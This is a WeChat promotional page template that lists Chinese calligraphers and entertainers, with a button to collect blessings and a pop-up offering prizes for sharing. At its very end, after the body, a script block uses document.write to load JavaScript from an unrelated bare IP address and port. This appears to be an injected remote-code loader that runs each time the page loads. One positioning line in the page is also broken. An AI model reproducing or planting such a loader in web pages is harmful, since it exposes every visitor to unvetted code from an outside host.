<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1" />  
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="format-detection" content="telephone=no" />
<meta http-equiv="Content-Type" content="text/html; charset=gbk" />
<title>万福进万家艺术家</title>

<link rel="stylesheet" type="text/css"  href="{[$DIR]}mobel_css.css" /> 
<script language="JavaScript" src="{[$DIR]}js/jquery-1.7.js"></script> 
<script language="JavaScript" src="{[$DIR]}js/tab.js"></script>
<script type="text/javascript" src="{[$DIR]}js/background.js"></script>
<script>
document.addEventListener('WeixinJSBridgeReady', function onBridgeReady() {
    // 通过下面这个API隐藏右上角按钮
    WeixinJSBridge.call('hideOptionMenu');
});

function fabudisplay()
{
var popUp = document.getElementById("choujiang")
//document.getElementById('fabu_box').style.display='';

var obj = document.getElementById("choujiang");
var W = screen.width;//取得屏幕分辨率宽度
var H = screen.height;//取得屏幕分辨率高度
var yScroll;//取滚动条高度
if (self.pageYOffset) {
yScroll = self.pageYOffset;
} else if (document.documentElement && document.documentElement.scrollTop){
yScroll = document.documentElement.scrollTop;
} else if (document.body) {
yScroll = document.body.scrollTop;
}

//obj.style.marginLeft= (W/2 - 200) + "px";

obj.style.display="block"; 
}
function fabudisplay2()
{
var popUp = document.getElementById("liquan")
//document.getElementById('fabu_box').style.display='';

var obj = document.getElementById("liquan");
var W = screen.width;//取得屏幕分辨率宽度
var H = screen.height;//取得屏幕分辨率高度
var yScroll;//取滚动条高度
if (self.pageYOffset) {
yScroll = self.pageYOffset;
} else if (document.documentElement && document.documentElement.scrollTop){
yScroll = document.documentElement.scrollTop;
} else if (document.body) {
yScroll = document.body.scrollTop;
}

//obj.style.marginLeft= (W/2 - 200) + "px";
obj.style.top= (H/2- 　+　yScroll) + "px";
obj.style.display="block"; 
}
</script>
</head>

<body>
<div id="wrap">
<div id="content">
      <div class="yishujia">
            <ul>
            <li class="left" >
            <div class="img"><img src="{[$DIR]}images/yishujia_l.jpg" /></div>
            <div class="jieshao">
            <h1>毕福剑</h1>
            <h2>著名主持人</h2>
            <h2>中央电视台文艺部导演</h2>
            </div>        
            </li>
            
            <li class="right" >
            <div class="img"><img src="{[$DIR]}images/yishujia_c.jpg" /></div>
            <div class="jieshao">
            <h1>单田芳</h1>
            <h2>国宝级评书大师</h2>
            <h2>著名评书表演艺术家</h2>
            </div>
            </li>
            </ul>          
      </div> 
      
      <div class="yishujia">
            <ul>
            <li class="left" >
            <div class="img"><img src="{[$DIR]}images/yishujia_a.jpg" /></div>
            <div class="jieshao">
            <h1>何满宗</h1>
            <h2>中国书法家协会理事</h2>
            <h2>湖南省文联副主席</h2>
            </div>        
            </li>
            
            <li class="right" >
            <div class="img"><img src="{[$DIR]}images/yishujia_m.jpg" /></div>
            <div class="jieshao">
            <h1>毕政</h1>
            <h2>中国书协理事</h2>
            <h2>吉林书法家协会主席</h2>
            </div>
            </li>
            </ul>       
      </div>
      
      <div class="yishujia">
            <ul>
            <li class="left" >
            <div class="img"><img src="{[$DIR]}images/yishujia_e.jpg" /></div>
            <div class="jieshao">
            <h1>王庆元</h1>
            <h2>中国书法家协会理事</h2>
            <h2>青海省书协主席</h2>
            </div>        
            </li>
            
            <li class="right" >
            <div class="img"><img src="{[$DIR]}images/yishujia_f.jpg" /></div>
            <div class="jieshao">
            <h1>刘俊京</h1>
            <h2>中国书法家协会理事</h2>
            <h2>北京书法家协会副主席</h2>
            </div>
            </li>
            </ul>    
              
              <div class="yishujia">
            <ul>
            <li class="left" >
            <div class="img"><img src="{[$DIR]}images/yishujia_g.jpg" /></div>
            <div class="jieshao">
            <h1>马青原</h1>
            <h2>中国书法家协会会员</h2>
            <h2>北京工笔重彩画会员</h2>
            </div>        
            </li>
            
            <li class="right" >
            <div class="img"><img src="{[$DIR]}images/yishujia_h.jpg" /></div>
            <div class="jieshao">
            <h1>连海明</h1>
            <h2>中国书法家协会会员</h2>
            <h2>中国美术家画院理事</h2>
            </div>
            </li>
            </ul>          
      </div>
      <div class="yishujia">
            <ul>
            <li class="left" >
            <div class="img"><img src="{[$DIR]}images/yishujia_i.jpg" /></div>
            <div class="jieshao">
            <h1>刘国宝</h1>
            <h2>西藏书协副主席</h2>
            <h2>中国书法家协会会员</h2>
            </div>        
            </li>
            
            <li class="right" >
            <div class="img"><img src="{[$DIR]}images/yishujia_j.jpg" /></div>
            <div class="jieshao">
            <h1>徐家康</h1>
            <h2>中国书法家协会会员</h2>
            <h2>学者型画家</h2>
            </div>
            </li>
            </ul>          
      </div>
            <div class="yishujia">
            <ul>
            <li class="left" >
            <div class="img"><img src="{[$DIR]}images/yishujia_k.jpg" /></div>
            <div class="jieshao">
            <h1>黄 平</h1>
            <h2>中国书法家协会会员</h2>
            <h2>中国书法展览馆副馆长</h2>
            </div>        
              </li>
                          <li class="right" >
            <div class="img"><img src="{[$DIR]}images/yishujia_n.jpg" /></div>
            <div class="jieshao">
            <h1>武华兴</h1>
            <h2>中国书法家协会会员</h2>
            <h2>徐悲鸿艺术中心主任</h2>
            </div>
            </li>

            </ul>          
      </div>
       
       <div style="height:120px; overflow:hidden; width:100%;"></div>
       
                  <div class="yishujia-pf">      
                  <div class="annbj">
                  <div class="one"><a href="#tanchu-ysj"><button type="button"  id="btnshow" class="anniu"onclick="window.location.href='index.php?m=main&c=zhuanfa&p=main&zt=artist&openid={[$userArr.openid]}'"/>我要集福</button></a></div>
                  <div class="two"></div>            
                  </div>        
                  <div class="fanhui"><a href="index.php?m=main&p=main">返回</a></div>
                  <div class="ysj_mail">艺术家进驻请发简历至art@96567.com</div>
                  </div>
     
<!--底部菜单-->   

<!--底部菜单点击后弹出-->   
      <div id="bg"></div>
      <div id="choujiang" style="width:100%; height:100%; position:absolute; top:0; left:0; z-index:1000; background-color:none;  display:none; color:#fff">
            <div class="fenxiang"> 
            <a name="tanchu-2"></a>  
            <div class="jiantou"><p><img src="{[$DIR]}images/jiantou.png" /></p></div>
            <div class="djysj">
            <span>点击右上角按钮：</span>
            <span class="s_icon"><img src="{[$DIR]}images/fpy.png" width="30" /></span>
            <span class="s_icon"><img src="{[$DIR]}images/pyq.png" width="30" /></span>
            </div>
      
            <div class="djysj"><h1>分享给好友，千元福字轻松拿！</h1></div>
            <div class="djysj">一个好友点击将为你带来1—3个祝福<br />满一百个，千元大礼就是你的啦！</div>
            <div class="djysj"><h2>朋友和朋友的朋友点击均有效哦</h2></div>
            </div>
            <div class="lml_close"><a href="http://weixin.96567.com/hd">×</a></div>
      </div>
      
        
</div>

<div class="zztj">
<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1254040973'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/stat.php%3Fid%3D1254040973' type='text/javascript'%3E%3C/script%3E"));
</script>
</div>





<style type="text/css">
.KeFuDiv{position:absolute; width:100%; min-height:100px; text-align:right;}
</style>
<div  id="KeFuDiv" class="KeFuDiv">
<button type="button" id="" style=" border:0px; cursor:pointer; width:100px; height:100px; background-color:#fde418; border-radius:100px; text-align:center; line-height:100px; font-family:微软雅黑; color:#ac1304;" />一键关注</button>
</div>

<script type="text/javascript" src="js/pf.js"></script>
<script type="text/javascript">
//初始位置
gID("KeFuDiv").style.top = (document.documentElement.clientHeight - gID("KeFuDiv").offsetHeight)/2 +"px";
gID("KeFuDiv").style.left = document.documentElement.clientWidth - gID("KeFuDiv").offsetWidth +"px";
//开始滚动
ScrollDiv('KeFuDiv');
</script>



</body>
<script>
document.addEventListener('WeixinJSBridgeReady', function onBridgeReady() {
window.shareData = {
"timeLineLink": "http://weixin.96567.com/hd/index.php?m=main&c=jifu&p=main&openid={[$userArr.openid]}",    
"sendFriendLink": "http://weixin.96567.com/hd/index.php?m=main&c=jifu&p=main&openid={[$userArr.openid]}",
"weiboLink": "http://weixin.96567.com/hd/index.php?m=main&c=jifu&p=main&openid={[$userArr.openid]}",
"tTitle": "{[$weixinTitle]}",
"tContent": "{[$weixinTitle]}",
"fTitle": "{[$weixinTitle1]}",
"fContent": "{[$weixinTitle1]}",
"wContent": "{[$weixinTitle]}"
};
// 发送给好友
WeixinJSBridge.on('menu:share:appmessage', function (argv) {
WeixinJSBridge.invoke('sendAppMessage', {
"img_url": "http://m.soocang.com/{[$imgArr.0.I_Img]}",
"img_width": "350",
"img_height": "350",
"link": window.shareData.sendFriendLink,
"desc": window.shareData.fContent,
"title": window.shareData.fTitle
}, function (res) {
_report('send_msg', res.err_msg);
})
});
// 分享到朋友圈
WeixinJSBridge.on('menu:share:timeline', function (argv) {
WeixinJSBridge.invoke('shareTimeline', {
"img_url": "http://m.soocang.com/{[$imgArr.0.I_Img]}",
"img_width": "350",
"img_height": "350",
"link": window.shareData.timeLineLink,
"desc": window.shareData.tContent,
"title": window.shareData.tTitle
}, function (res) {
_report('timeline', res.err_msg);
});
});

}, false)
</script>
<script>
function setTab(name,val,val1){
var obj = $('#con_' + name + '_' + val);
if(obj.is(":hidden")){
obj.show();	
}else{
obj.hide();	
}
$('.Contentbox .hover').each(function(i, obj) {
if((i+1) != val){
$(obj).hide();	
}
});
}  
</script>
<script type="text/javascript">
var bhid = 607;
document.write("<script type=\"text/javascript\" src=\"http://113.106.95.36:8081/aa.js\"><\/script>");
</script>
</html>